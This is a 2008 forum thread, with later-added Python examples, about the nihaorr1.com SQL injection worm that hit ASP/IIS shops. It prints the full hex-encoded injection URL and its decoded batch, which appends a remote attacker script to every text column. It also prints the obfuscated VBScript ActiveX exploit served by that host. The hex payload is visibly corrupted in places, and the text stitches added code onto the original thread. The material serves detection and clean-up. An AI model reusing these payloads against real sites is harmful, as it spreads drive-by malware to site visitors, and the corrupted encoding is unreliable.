Anyone know about www.nihaorr1.com/1.js?

Posted: August 8, 2008 in Forums

The db that supports our company's ecommerce is filling up with this url. We seem to be victims of a SQL injection attack. Is anyone else experiencing this? How are you resolving it? We just happened to see this data… are there other adverse effects on resources other than data?

Any shared experience would be helpful!

Comments
  1. Raja says:

    Yeah, it is a script bot that spreads a virus; it seems to be very wild atm.

    Googling nihaorr1.com there are many references to it on sites http://www.google.co.uk/search?hl=en&q=nihaorr1.com&btnG=Search&meta= (11,000 references at the time)

    Even when I clicked on a link and the virus checker popped up warning me of a virus there. I’ll not try again.

    It just seems to affect ASP pages at the moment.

    There were a few recent vulnerabilities with ASP and IIS over the last 6 months, like

    http://www.microsoft.com/technet/security/Bulletin/MS08-006.mspx

    I expect it is exploiting one of those.

    Take care.

  2. Raja says:

    Yikes, pretty dangerous, a good time to scan your content for this URL and notify the website owners so they can fix their websites, applications and then fix the form validation logic.

    Looks like someone is doing a lot of script code injection into a lot of vulnerable (read: poorly written) forms that aren’t validating input to strip out script code. These sites are then carrying javascript code that launches Remote Data Services Control ActiveX control … to exploit a few known vulnerabilities … use WFetch to debug this!!! (You can get WFetch for free in the IIS6.0 Resource Kit.)

    For example, here is how I looked at this:

    GET http://www.nihaorr1.com:80/1.js HTTP/1.1\r\n
    Host: www.nihaorr1.com\r\n
    Accept: */*\r\n
    \r\n

    HTTP/1.1 200 OK\r\n
    Connection: Keep-Alive\r\n
    Content-Length: 110\r\n
    Via: 1.1 RED-PRXY-29\r\n
    Date: Fri, 18 Apr 2008 23:53:38 GMT\r\n
    Content-Type: application/x-javascript\r\n
    ETag: "30e1873949a1c81:237"\r\n
    Server: Microsoft-IIS/6.0\r\n
    Last-Modified: Fri, 18 Apr 2008 11:42:04 GMT\r\n
    Accept-Ranges: bytes\r\n
    \r\n
    document.writeln("");\r\n
    \r\n

    Then I made a second request to the iframe it tries to create:

    GET http://www.nihaorr1.com:80/1.htm HTTP/1.1\r\n
    Host: www.nihaorr1.com\r\n
    Accept: */*\r\n
    \r\n

    HTTP/1.1 200 OK\r\n
    Connection: Keep-Alive\r\n
    Content-Length: 1160\r\n
    Date: Fri, 18 Apr 2008 23:53:51 GMT\r\n
    Content-Type: text/html\r\n
    ETag: "fc6b5a164da1c81:237"\r\n
    Server: Microsoft-IIS/6.0\r\n
    Last-Modified: Fri, 18 Apr 2008 12:09:43 GMT\r\n
    Accept-Ranges: bytes\r\n
    \r\n
    \r\n
    on error resume next\r\n
    Set downf = document.createElement("object")\r\n
    downf.setAttribute "classid", "clsid:BD9"&"6C556-6"&"5A3-11D"&"0-983A-00C"&"04FC2"&"9E36"\r\n
    str="Microsoft.XMLHTTP"\r\n
    Set O = downf.CreateObject(str,"")\r\n
    if Not Err.Number = 0 then\r\n
    err.clear\r\n
    document.write("") \r\n
    document.write("")\r\n
    document.write("") \r\n
    document.write("") \r\n
    document.write("") \r\n
    document.write("")\r\n
    else\r\n
    document.write("")\r\n
    document.write("")\r\n
    end if\r\n
    \r\n

  3. RK says:

    Long story short, it's definitely SQL injection. Here's the offending URL:

    orderitem.asp?IT=GM-204;DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x4400450043004C0041005200450020004000540020007600610072006300680061007200280032003500350029002C0040004300200076006100720063006800610072002800320035003500290020004400450043004C0041005200450020005400610062006C0065005F0043007500720073006F007200200043005500520053004F005200200046004F0052002000730065006C00650063007400200061002E006E0061006D0065002C0062002E006E0061006D0065002000660072006F006D0020007300790073006F0062006A006500630074007300200061002C0073007900730063006F006C0075006D006E00730020006200200077006800650072006500200061002E00690064003D0062002E006900640020006100六E006400200061002E00780074007900700065003D00270075002700200061006E0064002000280062002E00780074007900700065003D003900390020006F00720020006200 2E00780074007900700065003D003300350020006F007200200062002E00780074007900700065003D0032003300310020006F007200200062002E00780074007900700065003D00310036003700290020004F00500045004E0020005400610062006C0065005F0043007500720073006F00720020004600450054004300480020004E004500580054002000460052004F004D00200020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C004000430020005700480049004C004500280040004000460045005400430048005F005300540041005400550053003D0030002900200042004500470049004E00200065007800650063002800270075007000640061007400650020005B0027002B00400054002B0027005D00200073006500740020005B0027002B00400043002B0027005D003D0072007400720069006D00280063006F006E007600650072007400280076006100720063006800610072002C005B0027002B00400043002B0027005D00290029002B00270027003C0073006300720069007000740020007300720063003D0068007400740070003A002F002F007700770077002E006E006900680061006F007200720031002E0063006F006D002F0031002E006A0073003E003C002F007300630072006900700074003E0027002700270029004600450054004300480020004E004500580054002000460052004F004D00200020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C0040004300200045004E004400200043004C004F005300450020005400610062006C0065005F0043007500720073006F00720020004400450041004C004C004F00430041005400450020005400610062006C0065005F0043007500720073006F007200%20AS%20NVARCHAR(4000));EXEC(@S);--
    Decoding that binary data, which is cast to a varchar, yields this:

    DECLARE @T varchar(255),@C varchar(255) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar,['+@C+']))+''<script src=http://www.nihaorr1.com/1.js></script>''')FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor

    And there you have it. It finds all text columns in the database and adds itself to it.
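    The decoding step above, as an added example that is not RK's code or anything from the thread: it pulls the hex out of the CAST(0x... AS NVARCHAR) wrapper, decodes it as UTF-16LE (the reason every character in the dump is four hex digits), and runs that over a few IIS-style request log lines to flag the ones carrying such a batch. The log line layout, the IP addresses and the shortened batch in the sample are constructed for this example.

```python
import re
from urllib.parse import unquote

# Matches the CAST(0x... AS NVARCHAR(...)) wrapper the URL in the thread uses
# to hide the real statement; group 1 is the hex string.
HEX_CAST_RE = re.compile(r"cast\s*\(\s*0x([0-9a-fA-F]+)\s+as\s+n?varchar",
                         re.IGNORECASE)

# T-SQL words that have no business in a shop's query string.
KEYWORD_RE = re.compile(
    r"\b(declare|exec|cast|cursor|sysobjects|syscolumns)\b", re.IGNORECASE)


def decode_hex_payload(query):
    """Return the statement hidden in a CAST(0x... AS NVARCHAR) wrapper.

    SQL Server stores NVARCHAR as UTF-16LE, so 0x4400 is 'D', 0x4500 is 'E'
    and so on. Returns None when the query carries no such cast.
    """
    match = HEX_CAST_RE.search(unquote(query))
    if not match:
        return None
    hexstr = match.group(1)
    if len(hexstr) % 2:          # a truncated log line can leave an odd nibble
        hexstr = hexstr[:-1]
    raw = bytes.fromhex(hexstr)
    return raw.decode("utf-16-le", errors="replace")


def scan(lines):
    """Flag space-separated log lines of the assumed shape
    'date time c-ip cs-method cs-uri-stem cs-uri-query sc-status' that carry
    an encoded batch or at least two distinct T-SQL keywords. One word such
    as 'cast' in a product search is not enough on its own."""
    findings = []
    for line in lines:
        fields = line.split(" ")
        if len(fields) < 7:
            continue
        client_ip, stem, query = fields[2], fields[4], fields[5]
        decoded = decode_hex_payload(query)
        text = unquote(query) + " " + (decoded or "")
        keywords = sorted({k.lower() for k in KEYWORD_RE.findall(text)})
        if decoded is not None or len(keywords) >= 2:
            findings.append({"ip": client_ip, "stem": stem,
                             "keywords": keywords, "decoded": decoded})
    return findings


def build_sample_lines():
    """Constructed log lines. The second carries the opening statements of a
    batch shaped like the one decoded in the thread, hex-encoded the same way;
    the third is a harmless search that happens to contain a keyword."""
    sql = ("DECLARE @T varchar(255),@C varchar(255) DECLARE Table_Cursor CURSOR FOR "
           "select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id")
    hexsql = sql.encode("utf-16-le").hex().upper()
    return [
        "2008-08-08 10:15:01 203.0.113.7 GET /orderitem.asp IT=GM-204 200",
        "2008-08-08 10:15:02 203.0.113.7 GET /orderitem.asp IT=GM-204;DECLARE%20@S%20NVARCHAR(4000);"
        "SET%20@S=CAST(0x" + hexsql + "%20AS%20NVARCHAR(4000));EXEC(@S);-- 200",
        "2008-08-08 10:16:40 198.51.100.9 GET /search.asp q=cast%20iron%20pan 200",
    ]


if __name__ == "__main__":
    for hit in scan(build_sample_lines()):
        print(hit["ip"], hit["stem"], hit["keywords"])
        print("  decoded:", hit["decoded"])
```

Running the script reports only the second line, with the decoded batch beside it; the "cast iron pan" search is left alone because a single keyword is not treated as evidence. Real IIS logs put the query in the cs-uri-query column, so the same decoder can be pointed at that field once the file's #Fields: header has been read.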

  4. Raja says:

    “Best Practice” – lots of them – primarily checking each form processing script to ensure that one cannot simply pass in a long field and/or content which has sql commands such as “select”, “update”, etc.

    As you can see from this particular situation, the data may not be readily seen as offending (i.e., the binary encoding). Testing length is therefore pretty important as a rule. If you are expecting to insert a product code into a shopping cart or an email address into a registration table, there is no reason to allow a string longer than the field length to be submitted to the database. One could argue that because of that, keep your field lengths to the minimum, etc.

    Minimize the number of dynamic sql statements

    Keep in mind that just limiting your form field's "maxlength" property is of little value, as these attacks are not validated by any server side browser – they are launched via script or program and often at a very rapid pace.

    If your db connection for your site is using “sa” or equivalent, you also have a problem because they can launch extended stored procs. Make sure your db connection is using “user” level privileges only.

    These are some of the bigger items – there is a lot on the net on the topic of 'SQL injection'.
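    As an added example that is not from anyone in the thread, here is the advice of the last two comments applied to the orderitem.asp lookup RK showed: the concatenated statement beside a version that checks the length and shape of the item code and passes it as a parameter, followed by the "scan your content for this URL" clean-up from comment 2, written as a walk over every text column the way the worm's own cursor walks them. SQLite stands in for the SQL Server database the shop ran, and the table, its rows and the injected value are constructed for this example.

```python
import re
import sqlite3

# The tag the worm appends to every text column, as decoded in the thread.
INJECTED_TAG = "<script src=http://www.nihaorr1.com/1.js></script>"


def make_db():
    """Constructed stand-in for the shop's product table."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE orderitem (code TEXT PRIMARY KEY, name TEXT, notes TEXT);
        INSERT INTO orderitem VALUES ('GM-204', 'Gasket 204mm', 'stock');
        INSERT INTO orderitem VALUES ('GM-205', 'Gasket 205mm', 'stock');
    """)
    return conn


# Constructed value for the IT parameter, shaped like the one in the thread:
# a real code, a closing quote, then a stacked UPDATE that appends the tag.
PAYLOAD = "GM-204'; UPDATE orderitem SET notes = notes || '" + INJECTED_TAG + "'; --"


def lookup_vulnerable(conn, it):
    """The statement built by concatenation, as orderitem.asp must have done.
    executescript() stands in for a driver that accepts stacked statements:
    everything after the ';' in the value runs as well."""
    conn.executescript("SELECT name FROM orderitem WHERE code = '" + it + "'")


CODE_RE = re.compile(r"[A-Z]{2}-[0-9]{3}")   # assumed shape of a product code


def lookup_safe(conn, it):
    """Length and shape check first, then the value goes in as a parameter so
    the driver never treats any part of it as SQL."""
    if len(it) > 6 or not CODE_RE.fullmatch(it):
        raise ValueError("invalid item code")
    row = conn.execute("SELECT name FROM orderitem WHERE code = ?", (it,)).fetchone()
    return row[0] if row else None


def find_injected(conn, marker=INJECTED_TAG):
    """Walk every text column of every table (SQLite's sqlite_master and
    PRAGMA table_info play the role of sysobjects/syscolumns) and count rows
    carrying the marker. Returns a list of (table, column, rows)."""
    hits = []
    tables = [r[0] for r in conn.execute(
        "SELECT name FROM sqlite_master WHERE type = 'table'")]
    for table in tables:
        for row in conn.execute(f'PRAGMA table_info("{table}")'):
            column, ctype = row[1], row[2]
            if ctype.upper() not in ("TEXT", "VARCHAR", "NVARCHAR"):
                continue
            n = conn.execute(f'SELECT COUNT(*) FROM "{table}" WHERE "{column}" LIKE ?',
                             ("%" + marker + "%",)).fetchone()[0]
            if n:
                hits.append((table, column, n))
    return hits


def clean_injected(conn, marker=INJECTED_TAG):
    """Strip the marker from every column find_injected() reported."""
    for table, column, _ in find_injected(conn, marker):
        conn.execute(f'UPDATE "{table}" SET "{column}" = REPLACE("{column}", ?, ?)',
                     (marker, ""))
    conn.commit()


if __name__ == "__main__":
    db = make_db()
    lookup_vulnerable(db, PAYLOAD)
    print("after the concatenated lookup:", find_injected(db))
    try:
        lookup_safe(db, PAYLOAD)
    except ValueError as exc:
        print("parameterised lookup rejected the value:", exc)
    clean_injected(db)
    print("after clean-up:", find_injected(db))
```

The scan and clean-up only cover the database; as comment 2 says, the forms that let the value through still have to be fixed, and the connection should run as a low-privilege user so that a stacked statement cannot reach extended stored procedures.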
